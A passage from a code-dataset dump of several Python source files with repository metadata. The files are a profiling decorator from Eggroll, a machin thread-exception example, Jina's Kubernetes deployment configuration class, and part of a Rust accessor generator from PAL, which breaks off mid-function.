|
2022-03-23T06:19:44.000Z
|
# Copyright (c) 2019 - now, Eggroll Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import inspect
from time import time, perf_counter
from eggroll.utils.log_utils import get_logger
L = get_logger(filename='profile')
def _method_profile_logger(func):
def wrapper(*args, **kwargs):
start_wall_time = time()
start_cpu_time = perf_counter()
result = func(*args, **kwargs)
end_wall_time = time()
end_cpu_time = perf_counter()
code = func.__code__
try:
outerframes = inspect.getouterframes(inspect.currentframe(), 2)
real_caller = outerframes[1]
L.trace(f'{{"metric_type": "func_profile", '
f'"qualname": "{func.__qualname__}", '
f'"caller": "{real_caller.filename.rsplit("/", 1)[-1]}:{real_caller.lineno}", '
f'"cpu_time": {end_cpu_time - start_cpu_time}, '
f'"wall_time": {end_wall_time - start_wall_time}}}')
return result
except Exception as e:
L.trace(f'{{"metric_type": "func_profile", '
f'"qualname": "{func.__qualname__}", '
f'"caller": "unknown", '
f'"cpu_time": {end_cpu_time - start_cpu_time}, '
f'"wall_time": {end_wall_time - start_wall_time}}}')
return wrapper
| 35.943396
| 98
| 0.623097
|
import inspect
from time import time, perf_counter
from eggroll.utils.log_utils import get_logger
L = get_logger(filename='profile')
def _method_profile_logger(func):
def wrapper(*args, **kwargs):
start_wall_time = time()
start_cpu_time = perf_counter()
result = func(*args, **kwargs)
end_wall_time = time()
end_cpu_time = perf_counter()
code = func.__code__
try:
outerframes = inspect.getouterframes(inspect.currentframe(), 2)
real_caller = outerframes[1]
L.trace(f'{{"metric_type": "func_profile", '
f'"qualname": "{func.__qualname__}", '
f'"caller": "{real_caller.filename.rsplit("/", 1)[-1]}:{real_caller.lineno}", '
f'"cpu_time": {end_cpu_time - start_cpu_time}, '
f'"wall_time": {end_wall_time - start_wall_time}}}')
return result
except Exception as e:
L.trace(f'{{"metric_type": "func_profile", '
f'"qualname": "{func.__qualname__}", '
f'"caller": "unknown", '
f'"cpu_time": {end_cpu_time - start_cpu_time}, '
f'"wall_time": {end_wall_time - start_wall_time}}}')
return wrapper
| true
| true
|
790dd66ed1fd5503977ff280cc651f855ea31907
| 501
|
py
|
Python
|
examples/tutorials/parallel_distributed/mth_exception.py
|
lethaiq/machin
|
7873cada457328952310394afeedcad4bb6a7c4a
|
[
"MIT"
] | 1
|
2021-04-01T21:21:23.000Z
|
2021-04-01T21:21:23.000Z
|
examples/tutorials/parallel_distributed/mth_exception.py
|
lethaiq/machin
|
7873cada457328952310394afeedcad4bb6a7c4a
|
[
"MIT"
] | null | null | null |
examples/tutorials/parallel_distributed/mth_exception.py
|
lethaiq/machin
|
7873cada457328952310394afeedcad4bb6a7c4a
|
[
"MIT"
] | null | null | null |
from machin.parallel.thread import Thread, ThreadException
import time
def test1():
time.sleep(1)
print("Exception occurred at {}".format(time.time()))
raise RuntimeError("Error")
if __name__ == "__main__":
t1 = Thread(target=test1)
t1.start()
while True:
try:
t1.watch()
except ThreadException as e:
print("Exception caught at {}".format(time.time()))
print("Exception is: {}".format(e))
break
t1.join()
| 22.772727
| 63
| 0.590818
|
from machin.parallel.thread import Thread, ThreadException
import time
def test1():
time.sleep(1)
print("Exception occurred at {}".format(time.time()))
raise RuntimeError("Error")
if __name__ == "__main__":
t1 = Thread(target=test1)
t1.start()
while True:
try:
t1.watch()
except ThreadException as e:
print("Exception caught at {}".format(time.time()))
print("Exception is: {}".format(e))
break
t1.join()
| true
| true
|
790dd67805d984f9cd1a0d14782011a31fbc0274
| 14,858
|
py
|
Python
|
jina/orchestrate/deployments/config/k8s.py
|
gauribhutani/jina
|
e1e23643f8260e6917d9704b63edc54bcebbc7e9
|
[
"Apache-2.0"
] | null | null | null |
jina/orchestrate/deployments/config/k8s.py
|
gauribhutani/jina
|
e1e23643f8260e6917d9704b63edc54bcebbc7e9
|
[
"Apache-2.0"
] | 1
|
2022-03-08T18:46:28.000Z
|
2022-03-08T18:47:24.000Z
|
jina/orchestrate/deployments/config/k8s.py
|
kuraakhilesh8230/jina
|
7cc23944fcdfd9944dc805ce8a116818d45317ee
|
[
"Apache-2.0"
] | 1
|
2022-03-17T04:50:07.000Z
|
2022-03-17T04:50:07.000Z
|
import copy
from argparse import Namespace
from typing import Dict, Union, List, Optional, Tuple
from jina import __default_executor__
from jina.enums import PodRoleType
from jina.excepts import NoContainerizedError
from jina.orchestrate.deployments.config.k8slib import kubernetes_deployment
from jina.orchestrate.deployments.config.helper import (
get_image_name,
to_compatible_name,
get_base_executor_version,
construct_runtime_container_args,
validate_uses,
)
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.deployments import BaseDeployment
class K8sDeploymentConfig:
"""
Class that implements the output of configuration files for Kubernetes for a given Deployment.
"""
class _K8sDeployment:
def __init__(
self,
name: str,
version: str,
pod_type: PodRoleType,
jina_deployment_name: str,
shard_id: Optional[int],
common_args: Union['Namespace', Dict],
deployment_args: Union['Namespace', Dict],
k8s_namespace: str,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
self.name = name
self.dns_name = to_compatible_name(name)
self.version = version
self.pod_type = pod_type
self.jina_deployment_name = jina_deployment_name
self.shard_id = shard_id
self.common_args = common_args
self.deployment_args = deployment_args
self.num_replicas = getattr(self.deployment_args, 'replicas', 1)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
def get_gateway_yamls(
self,
) -> List[Dict]:
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-standard'
)
cargs = copy.copy(self.deployment_args)
cargs.env = None
cargs.deployments_addresses = self.k8s_deployments_addresses
from jina.helper import ArgNamespace
from jina.parsers import set_gateway_parser
taboo = {
'uses_with',
'uses_metas',
'volumes',
'uses_before',
'uses_after',
'workspace',
'workspace_id',
'upload_files',
'noblock_on_start',
}
non_defaults = ArgNamespace.get_non_defaults_args(
cargs, set_gateway_parser(), taboo=taboo
)
_args = ArgNamespace.kwargs2list(non_defaults)
container_args = ['gateway'] + _args
if not cargs.k8s_connection_pool:
container_args.append('--k8s-disable-connection-pool')
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
container_cmd='["jina"]',
container_args=f'{container_args}',
replicas=1,
pull_policy='IfNotPresent',
jina_deployment_name='gateway',
pod_type=self.pod_type,
port=self.common_args.port,
env=cargs.env,
)
def _get_image_name(self, uses: Optional[str]):
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-perf'
)
if uses is not None and uses != __default_executor__:
image_name = get_image_name(uses)
return image_name
def _get_container_args(self, cargs, pod_type):
uses_metas = cargs.uses_metas or {}
uses_with = self.deployment_args.uses_with
if cargs.uses != __default_executor__:
cargs.uses = 'config.yml'
return construct_runtime_container_args(
cargs, uses_metas, uses_with, pod_type
)
def get_runtime_yamls(
self,
) -> List[Dict]:
cargs = copy.copy(self.deployment_args)
image_name = self._get_image_name(cargs.uses)
image_name_uses_before = (
self._get_image_name(cargs.uses_before)
if hasattr(cargs, 'uses_before') and cargs.uses_before
else None
)
image_name_uses_after = (
self._get_image_name(cargs.uses_after)
if hasattr(cargs, 'uses_after') and cargs.uses_after
else None
)
container_args = self._get_container_args(cargs, pod_type=self.pod_type)
container_args_uses_before = None
if getattr(cargs, 'uses_before', False):
uses_before_cargs = copy.copy(cargs)
uses_before_cargs.uses = cargs.uses_before
uses_before_cargs.name = f'{self.common_args.name}/uses-before'
uses_before_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE
uses_before_cargs.uses_before_address = None
uses_before_cargs.uses_after_address = None
uses_before_cargs.uses_before = None
uses_before_cargs.uses_after = None
uses_before_cargs.uses_with = None
uses_before_cargs.uses_metas = None
uses_before_cargs.env = None
uses_before_cargs.connection_list = None
uses_before_cargs.runtime_cls = 'WorkerRuntime'
uses_before_cargs.pod_role = PodRoleType.WORKER
uses_before_cargs.polling = None
container_args_uses_before = self._get_container_args(
uses_before_cargs, PodRoleType.WORKER
)
container_args_uses_after = None
if getattr(cargs, 'uses_after', False):
uses_after_cargs = copy.copy(cargs)
uses_after_cargs.uses = cargs.uses_after
uses_after_cargs.name = f'{self.common_args.name}/uses-after'
uses_after_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_AFTER
uses_after_cargs.uses_before_address = None
uses_after_cargs.uses_after_address = None
uses_after_cargs.uses_before = None
uses_after_cargs.uses_after = None
uses_after_cargs.uses_with = None
uses_after_cargs.uses_metas = None
uses_after_cargs.env = None
uses_after_cargs.connection_list = None
uses_after_cargs.runtime_cls = 'WorkerRuntime'
uses_after_cargs.pod_role = PodRoleType.WORKER
uses_after_cargs.polling = None
container_args_uses_after = self._get_container_args(
uses_after_cargs, PodRoleType.WORKER
)
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
image_name_uses_after=image_name_uses_after,
image_name_uses_before=image_name_uses_before,
container_cmd='["jina"]',
container_cmd_uses_before='["jina"]',
container_cmd_uses_after='["jina"]',
container_args=f'{container_args}',
container_args_uses_before=container_args_uses_before,
container_args_uses_after=container_args_uses_after,
replicas=self.num_replicas,
pull_policy='IfNotPresent',
jina_deployment_name=self.jina_deployment_name,
pod_type=self.pod_type,
shard_id=self.shard_id,
env=cargs.env,
gpus=cargs.gpus if hasattr(cargs, 'gpus') else None,
)
def __init__(
self,
args: Union['Namespace', Dict],
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
# External Deployments should be ignored in a K8s based Flow
assert not (hasattr(args, 'external') and args.external)
if not validate_uses(args.uses):
raise NoContainerizedError(
f'Executor "{args.uses}" is not valid to be used in K8s. '
'You need to use a containerized Executor. You may check `jina hub --help` to see how Jina Hub can help you building containerized Executors.'
)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
self.head_deployment = None
self.args = copy.copy(args)
if k8s_namespace is not None:
# otherwise it will remain with the one from the original Deployment
self.args.k8s_namespace = k8s_namespace
self.args.k8s_connection_pool = k8s_connection_pool
self.name = self.args.name
self.deployment_args = self._get_deployment_args(self.args)
if self.deployment_args['head_deployment'] is not None:
self.head_deployment = self._K8sDeployment(
name=self.deployment_args['head_deployment'].name,
version=get_base_executor_version(),
shard_id=None,
jina_deployment_name=self.name,
common_args=self.args,
deployment_args=self.deployment_args['head_deployment'],
pod_type=PodRoleType.HEAD,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses,
)
self.worker_deployments = []
deployment_args = self.deployment_args['deployments']
for i, args in enumerate(deployment_args):
name = f'{self.name}-{i}' if len(deployment_args) > 1 else f'{self.name}'
self.worker_deployments.append(
self._K8sDeployment(
name=name,
version=get_base_executor_version(),
shard_id=i,
common_args=self.args,
deployment_args=args,
pod_type=PodRoleType.WORKER
if name != 'gateway'
else PodRoleType.GATEWAY,
jina_deployment_name=self.name,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses
if name == 'gateway'
else None,
)
)
def _get_deployment_args(self, args):
parsed_args = {
'head_deployment': None,
'deployments': [],
}
shards = getattr(args, 'shards', 1)
uses_before = getattr(args, 'uses_before', None)
uses_after = getattr(args, 'uses_after', None)
if args.name != 'gateway':
parsed_args['head_deployment'] = BaseDeployment._copy_to_head_args(
self.args
)
parsed_args['head_deployment'].gpus = None
parsed_args['head_deployment'].port = K8sGrpcConnectionPool.K8S_PORT
parsed_args['head_deployment'].uses = None
parsed_args['head_deployment'].uses_metas = None
parsed_args['head_deployment'].uses_with = None
parsed_args['head_deployment'].env = None
# if the k8s connection pool is disabled, the connection pool is managed manually
if not self.k8s_connection_pool:
import json
connection_list = {}
for i in range(shards):
name = (
f'{to_compatible_name(self.name)}-{i}'
if shards > 1
else f'{to_compatible_name(self.name)}'
)
connection_list[
str(i)
] = f'{name}.{self.k8s_namespace}.svc:{K8sGrpcConnectionPool.K8S_PORT}'
parsed_args['head_deployment'].connection_list = json.dumps(
connection_list
)
if uses_before:
parsed_args[
'head_deployment'
].uses_before_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE}'
)
if uses_after:
parsed_args[
'head_deployment'
].uses_after_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_AFTER}'
)
for i in range(shards):
cargs = copy.deepcopy(args)
cargs.shard_id = i
cargs.uses_before = None
cargs.uses_after = None
if args.name != 'gateway':
cargs.port = K8sGrpcConnectionPool.K8S_PORT
cargs.uses_before_address = None
cargs.uses_after_address = None
if shards > 1:
cargs.name = f'{cargs.name}-{i}'
if args.name == 'gateway':
cargs.pod_role = PodRoleType.GATEWAY
# the worker runtimes do not care
else:
cargs.k8s_connection_pool = False
parsed_args['deployments'].append(cargs)
return parsed_args
def to_k8s_yaml(
self,
) -> List[Tuple[str, List[Dict]]]:
"""
Return a list of dictionary configurations. One for each deployment in this Deployment
.. # noqa: DAR201
.. # noqa: DAR101
"""
if self.name == 'gateway':
return [
(
'gateway',
self.worker_deployments[0].get_gateway_yamls(),
)
]
else:
deployments = [self.head_deployment]
deployments.extend(self.worker_deployments)
return [
(
deployment.dns_name,
deployment.get_runtime_yamls(),
)
for deployment in deployments
]
| 40.485014
| 158
| 0.573428
|
import copy
from argparse import Namespace
from typing import Dict, Union, List, Optional, Tuple
from jina import __default_executor__
from jina.enums import PodRoleType
from jina.excepts import NoContainerizedError
from jina.orchestrate.deployments.config.k8slib import kubernetes_deployment
from jina.orchestrate.deployments.config.helper import (
get_image_name,
to_compatible_name,
get_base_executor_version,
construct_runtime_container_args,
validate_uses,
)
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.deployments import BaseDeployment
class K8sDeploymentConfig:
class _K8sDeployment:
def __init__(
self,
name: str,
version: str,
pod_type: PodRoleType,
jina_deployment_name: str,
shard_id: Optional[int],
common_args: Union['Namespace', Dict],
deployment_args: Union['Namespace', Dict],
k8s_namespace: str,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
self.name = name
self.dns_name = to_compatible_name(name)
self.version = version
self.pod_type = pod_type
self.jina_deployment_name = jina_deployment_name
self.shard_id = shard_id
self.common_args = common_args
self.deployment_args = deployment_args
self.num_replicas = getattr(self.deployment_args, 'replicas', 1)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
def get_gateway_yamls(
self,
) -> List[Dict]:
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-standard'
)
cargs = copy.copy(self.deployment_args)
cargs.env = None
cargs.deployments_addresses = self.k8s_deployments_addresses
from jina.helper import ArgNamespace
from jina.parsers import set_gateway_parser
taboo = {
'uses_with',
'uses_metas',
'volumes',
'uses_before',
'uses_after',
'workspace',
'workspace_id',
'upload_files',
'noblock_on_start',
}
non_defaults = ArgNamespace.get_non_defaults_args(
cargs, set_gateway_parser(), taboo=taboo
)
_args = ArgNamespace.kwargs2list(non_defaults)
container_args = ['gateway'] + _args
if not cargs.k8s_connection_pool:
container_args.append('--k8s-disable-connection-pool')
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
container_cmd='["jina"]',
container_args=f'{container_args}',
replicas=1,
pull_policy='IfNotPresent',
jina_deployment_name='gateway',
pod_type=self.pod_type,
port=self.common_args.port,
env=cargs.env,
)
def _get_image_name(self, uses: Optional[str]):
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-perf'
)
if uses is not None and uses != __default_executor__:
image_name = get_image_name(uses)
return image_name
def _get_container_args(self, cargs, pod_type):
uses_metas = cargs.uses_metas or {}
uses_with = self.deployment_args.uses_with
if cargs.uses != __default_executor__:
cargs.uses = 'config.yml'
return construct_runtime_container_args(
cargs, uses_metas, uses_with, pod_type
)
def get_runtime_yamls(
self,
) -> List[Dict]:
cargs = copy.copy(self.deployment_args)
image_name = self._get_image_name(cargs.uses)
image_name_uses_before = (
self._get_image_name(cargs.uses_before)
if hasattr(cargs, 'uses_before') and cargs.uses_before
else None
)
image_name_uses_after = (
self._get_image_name(cargs.uses_after)
if hasattr(cargs, 'uses_after') and cargs.uses_after
else None
)
container_args = self._get_container_args(cargs, pod_type=self.pod_type)
container_args_uses_before = None
if getattr(cargs, 'uses_before', False):
uses_before_cargs = copy.copy(cargs)
uses_before_cargs.uses = cargs.uses_before
uses_before_cargs.name = f'{self.common_args.name}/uses-before'
uses_before_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE
uses_before_cargs.uses_before_address = None
uses_before_cargs.uses_after_address = None
uses_before_cargs.uses_before = None
uses_before_cargs.uses_after = None
uses_before_cargs.uses_with = None
uses_before_cargs.uses_metas = None
uses_before_cargs.env = None
uses_before_cargs.connection_list = None
uses_before_cargs.runtime_cls = 'WorkerRuntime'
uses_before_cargs.pod_role = PodRoleType.WORKER
uses_before_cargs.polling = None
container_args_uses_before = self._get_container_args(
uses_before_cargs, PodRoleType.WORKER
)
container_args_uses_after = None
if getattr(cargs, 'uses_after', False):
uses_after_cargs = copy.copy(cargs)
uses_after_cargs.uses = cargs.uses_after
uses_after_cargs.name = f'{self.common_args.name}/uses-after'
uses_after_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_AFTER
uses_after_cargs.uses_before_address = None
uses_after_cargs.uses_after_address = None
uses_after_cargs.uses_before = None
uses_after_cargs.uses_after = None
uses_after_cargs.uses_with = None
uses_after_cargs.uses_metas = None
uses_after_cargs.env = None
uses_after_cargs.connection_list = None
uses_after_cargs.runtime_cls = 'WorkerRuntime'
uses_after_cargs.pod_role = PodRoleType.WORKER
uses_after_cargs.polling = None
container_args_uses_after = self._get_container_args(
uses_after_cargs, PodRoleType.WORKER
)
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
image_name_uses_after=image_name_uses_after,
image_name_uses_before=image_name_uses_before,
container_cmd='["jina"]',
container_cmd_uses_before='["jina"]',
container_cmd_uses_after='["jina"]',
container_args=f'{container_args}',
container_args_uses_before=container_args_uses_before,
container_args_uses_after=container_args_uses_after,
replicas=self.num_replicas,
pull_policy='IfNotPresent',
jina_deployment_name=self.jina_deployment_name,
pod_type=self.pod_type,
shard_id=self.shard_id,
env=cargs.env,
gpus=cargs.gpus if hasattr(cargs, 'gpus') else None,
)
def __init__(
self,
args: Union['Namespace', Dict],
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
assert not (hasattr(args, 'external') and args.external)
if not validate_uses(args.uses):
raise NoContainerizedError(
f'Executor "{args.uses}" is not valid to be used in K8s. '
'You need to use a containerized Executor. You may check `jina hub --help` to see how Jina Hub can help you building containerized Executors.'
)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
self.head_deployment = None
self.args = copy.copy(args)
if k8s_namespace is not None:
self.args.k8s_namespace = k8s_namespace
self.args.k8s_connection_pool = k8s_connection_pool
self.name = self.args.name
self.deployment_args = self._get_deployment_args(self.args)
if self.deployment_args['head_deployment'] is not None:
self.head_deployment = self._K8sDeployment(
name=self.deployment_args['head_deployment'].name,
version=get_base_executor_version(),
shard_id=None,
jina_deployment_name=self.name,
common_args=self.args,
deployment_args=self.deployment_args['head_deployment'],
pod_type=PodRoleType.HEAD,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses,
)
self.worker_deployments = []
deployment_args = self.deployment_args['deployments']
for i, args in enumerate(deployment_args):
name = f'{self.name}-{i}' if len(deployment_args) > 1 else f'{self.name}'
self.worker_deployments.append(
self._K8sDeployment(
name=name,
version=get_base_executor_version(),
shard_id=i,
common_args=self.args,
deployment_args=args,
pod_type=PodRoleType.WORKER
if name != 'gateway'
else PodRoleType.GATEWAY,
jina_deployment_name=self.name,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses
if name == 'gateway'
else None,
)
)
def _get_deployment_args(self, args):
parsed_args = {
'head_deployment': None,
'deployments': [],
}
shards = getattr(args, 'shards', 1)
uses_before = getattr(args, 'uses_before', None)
uses_after = getattr(args, 'uses_after', None)
if args.name != 'gateway':
parsed_args['head_deployment'] = BaseDeployment._copy_to_head_args(
self.args
)
parsed_args['head_deployment'].gpus = None
parsed_args['head_deployment'].port = K8sGrpcConnectionPool.K8S_PORT
parsed_args['head_deployment'].uses = None
parsed_args['head_deployment'].uses_metas = None
parsed_args['head_deployment'].uses_with = None
parsed_args['head_deployment'].env = None
if not self.k8s_connection_pool:
import json
connection_list = {}
for i in range(shards):
name = (
f'{to_compatible_name(self.name)}-{i}'
if shards > 1
else f'{to_compatible_name(self.name)}'
)
connection_list[
str(i)
] = f'{name}.{self.k8s_namespace}.svc:{K8sGrpcConnectionPool.K8S_PORT}'
parsed_args['head_deployment'].connection_list = json.dumps(
connection_list
)
if uses_before:
parsed_args[
'head_deployment'
].uses_before_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE}'
)
if uses_after:
parsed_args[
'head_deployment'
].uses_after_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_AFTER}'
)
for i in range(shards):
cargs = copy.deepcopy(args)
cargs.shard_id = i
cargs.uses_before = None
cargs.uses_after = None
if args.name != 'gateway':
cargs.port = K8sGrpcConnectionPool.K8S_PORT
cargs.uses_before_address = None
cargs.uses_after_address = None
if shards > 1:
cargs.name = f'{cargs.name}-{i}'
if args.name == 'gateway':
cargs.pod_role = PodRoleType.GATEWAY
else:
cargs.k8s_connection_pool = False
parsed_args['deployments'].append(cargs)
return parsed_args
def to_k8s_yaml(
self,
) -> List[Tuple[str, List[Dict]]]:
if self.name == 'gateway':
return [
(
'gateway',
self.worker_deployments[0].get_gateway_yamls(),
)
]
else:
deployments = [self.head_deployment]
deployments.extend(self.worker_deployments)
return [
(
deployment.dns_name,
deployment.get_runtime_yamls(),
)
for deployment in deployments
]
| true
| true
|
790dd77e78274904638c9891f524368b9cccc01a
| 6,422
|
py
|
Python
|
pal/generator/rust_generator.py
|
mars-research/pal
|
5977394cda8750ff5dcb89c2bf193ec1ef4cd137
|
[
"MIT"
] | null | null | null |
pal/generator/rust_generator.py
|
mars-research/pal
|
5977394cda8750ff5dcb89c2bf193ec1ef4cd137
|
[
"MIT"
] | 1
|
2021-08-23T15:54:10.000Z
|
2021-09-28T12:44:36.000Z
|
pal/generator/rust_generator.py
|
mars-research/pal
|
5977394cda8750ff5dcb89c2bf193ec1ef4cd137
|
[
"MIT"
] | null | null | null |
import os
import pathlib
from pal.generator.abstract_generator import AbstractGenerator
from pal.logger import logger
from pal.exception import PalGeneratorException
from pal.filter import filters
from pal.transform import transforms
class RustGenerator(AbstractGenerator):
def generate_registers(self, regs, outpath):
try:
regs = transforms["remove_reserved_0"].transform(regs)
regs = transforms["remove_reserved_1"].transform(regs)
regs = transforms["remove_reserved_sign_extended"].transform(regs)
regs = transforms["remove_implementation_defined"].transform(regs)
regs = transforms["special_to_underscore"].transform(regs)
regs = transforms["insert_valid_first_character"].transform(regs)
regs = transforms["remove_redundant_am"].transform(regs)
regs = transforms["remove_redundant_fields"].transform(regs)
regs = transforms["unique_fieldset_names"].transform(regs)
regs = filters["no_access_mechanism"].filter_exclusive(regs)
regs = filters["irregular_size"].filter_exclusive(regs)
logger.info("Generating Rust register accessors to: " + str(outpath))
for reg in regs:
outfile_path = os.path.join(outpath, reg.name.lower() + ".rs")
outfile_path = os.path.abspath(outfile_path)
with open(outfile_path, "w") as outfile:
self._generate_register(outfile, reg)
self.__update_module_files(outpath)
self.__update_lib_file(outpath)
except Exception as e:
msg = "{g} failed to generate output {out}: {exception}".format(
g=str(type(self).__name__),
out=outpath,
exception=e)
raise PalGeneratorException(msg)
def generate_instructions(self, instructions, outpath):
try:
logger.info("Generating Rust instruction accessors to: " + str(outpath))
for inst in instructions:
outfile_path = os.path.join(outpath, inst.name.lower() + ".rs")
outfile_path = os.path.abspath(outfile_path)
with open(outfile_path, "w") as outfile:
self._generate_instruction(outfile, inst)
self.__update_module_files(outpath)
self.__update_lib_file(outpath)
except Exception as e:
msg = "{g} failed to generate output {out}: {exception}".format(
g=str(type(self).__name__),
out=outpath,
exception=e)
raise PalGeneratorException(msg)
def _generate_register(self, outfile, reg):
self.writer.declare_register_dependencies(outfile, reg, self.config)
if self.config.enable_printers == True:
self.writer.declare_print_mechanism_dependencies(outfile, reg)
for am_key, am_list in reg.access_mechanisms.items():
for am in am_list:
self.writer.declare_access_mechanism_dependencies(outfile, reg, am)
self.writer.write_newline(outfile)
self._generate_register_comment(outfile, reg)
self.writer.declare_register_accessors(outfile, reg)
for idx, fieldset in enumerate(reg.fieldsets):
if fieldset.condition:
self.writer.declare_comment(outfile, fieldset.condition, 79)
for field in fieldset.fields:
self.writer.declare_field_accessors(outfile, reg, field)
if self.config.enable_printers == True:
self.writer.declare_field_printers(outfile, reg, field)
if reg.is_readable() and self.config.enable_printers == True:
self.writer.declare_fieldset_printers(outfile, reg, fieldset)
def _generate_instruction(self, outfile, inst):
self.writer.declare_instruction_dependencies(outfile, inst, self.config)
self.writer.declare_instruction_accessor(outfile, inst)
self.writer.write_newline(outfile)
def _generate_register_comment(self, outfile, reg):
comment = "{name} ({long_name}){separator}{purpose}".format(
name=str(reg.name),
long_name=str(reg.long_name),
separator=" - " if reg.purpose else "",
purpose=str(reg.purpose)
)
self.writer.declare_comment(outfile, comment, 75)
def __update_module_files(self, outpath):
modfile_path = os.path.join(outpath, "mod.rs")
modfile_path = os.path.abspath(modfile_path)
for root, dirs, files in os.walk(outpath):
logger.info("Updating modfile: " + os.path.join(root, "mod.rs"))
with open(os.path.join(root, "mod.rs"), "w") as modfile:
for name in sorted(files):
if name != "mod.rs" and name.endswith(".rs"):
modname = os.path.splitext(name)[0]
modfile.write("pub mod " + modname + ";")
self.writer.write_newline(modfile)
modfile.write("pub use " + modname + "::*;")
self.writer.write_newline(modfile)
for name in sorted(dirs):
modname = os.path.splitext(name)[0]
modfile.write("pub mod " + modname + ";")
self.writer.write_newline(modfile)
modfile.write("pub use " + modname + "::*;")
self.writer.write_newline(modfile)
def __update_lib_file(self, outpath):
libfile_path = os.path.abspath(os.path.join(outpath, "lib.rs"))
libfile_dir = os.path.abspath(outpath)
if not os.path.exists(libfile_path):
libfile_path = os.path.abspath(os.path.join(outpath, "../lib.rs"))
libfile_dir = os.path.abspath(os.path.join(outpath, "../"))
if not os.path.exists(libfile_path):
return
logger.info("Updating lib.rs: " + str(libfile_path))
with open(libfile_path, "w") as libfile:
for child in [f.path for f in os.scandir(libfile_dir)]:
logger.info("child: " + str(child))
modname = os.path.splitext(os.path.basename(child))[0]
if not modname == "lib":
libfile.write("pub mod " + modname + ";")
self.writer.write_newline(libfile)
| 42.25
| 84
| 0.608066
|
import os
import pathlib
from pal.generator.abstract_generator import AbstractGenerator
from pal.logger import logger
from pal.exception import PalGeneratorException
from pal.filter import filters
from pal.transform import transforms
class RustGenerator(AbstractGenerator):
def generate_registers(self, regs, outpath):
try:
regs = transforms["remove_reserved_0"].transform(regs)
regs = transforms["remove_reserved_1"].transform(regs)
regs = transforms["remove_reserved_sign_extended"].transform(regs)
regs = transforms["remove_implementation_defined"].transform(regs)
regs = transforms["special_to_underscore"].transform(regs)
regs = transforms["insert_valid_first_character"].transform(regs)
regs = transforms["remove_redundant_am"].transform(regs)
regs = transforms["remove_redundant_fields"].transform(regs)
regs = transforms["unique_fieldset_names"].transform(regs)
regs = filters["no_access_mechanism"].filter_exclusive(regs)
regs = filters["irregular_size"].filter_exclusive(regs)
logger.info("Generating Rust register accessors to: " + str(outpath))
for reg in regs:
outfile_path = os.path.join(outpath, reg.name.lower() + ".rs")
outfile_path = os.path.abspath(outfile_path)
with open(outfile_path, "w") as outfile:
self._generate_register(outfile, reg)
self.__update_module_files(outpath)
self.__update_lib_file(outpath)
except Exception as e:
msg = "{g} failed to generate output {out}: {exception}".format(
g=str(type(self).__name__),
out=outpath,
exception=e)
raise PalGeneratorException(msg)
def generate_instructions(self, instructions, outpath):
try:
logger.info("Generating Rust instruction accessors to: " + str(outpath))
for inst in instructions:
outfile_path = os.path.join(outpath, inst.name.lower() + ".rs")
outfile_path = os.path.abspath(outfile_path)
with open(outfile_path, "w") as outfile:
self._generate_instruction(outfile, inst)
self.__update_module_files(outpath)
self.__update_lib_file(outpath)
except Exception as e:
msg = "{g} failed to generate output {out}: {exception}".format(
